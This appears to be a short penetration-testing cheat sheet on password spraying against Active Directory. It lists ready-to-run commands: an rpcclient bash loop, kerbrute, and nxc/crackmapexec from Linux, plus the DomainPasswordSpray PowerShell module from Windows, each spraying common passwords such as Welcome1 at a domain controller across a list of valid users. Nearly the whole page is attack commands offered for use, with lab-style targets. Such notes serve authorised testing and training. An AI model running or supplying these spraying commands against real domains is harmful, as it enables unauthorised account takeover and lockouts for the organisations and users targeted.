# password-spraying-

## Internal password spray attack (from linux)

**rpcclient (bash one-linear)**&#x20;

```
for u in $(cat valid_users.txt);do rpcclient -U "$u%Weasal" -c "getusername;quit" <dc_ip> | grep Authority; done
```

**Kerbrute**&#x20;

```
kerbrute passwordspray -d inlanefreight.local --dc 172.16.7.3 valid_users.txt  Welcome1
```

**Crackmapexec**&#x20;

```
sudo nxc smb <dc_ip> -u valid_users.txt -p Password123 | grep +
```

***

## Internal password spraying (from windows)&#x20;

**DomainPasswordSpray**&#x20;

[DomainPasswordSpray](https://github.com/dafthack/DomainPasswordSpray)

```
Import-module .\DomainPasswordSpray.ps1
```

```
Invoke-DomainPasswordSpray -Password Welcome1 -OutFile spray_success -ErrorAction SilentlyContinue
```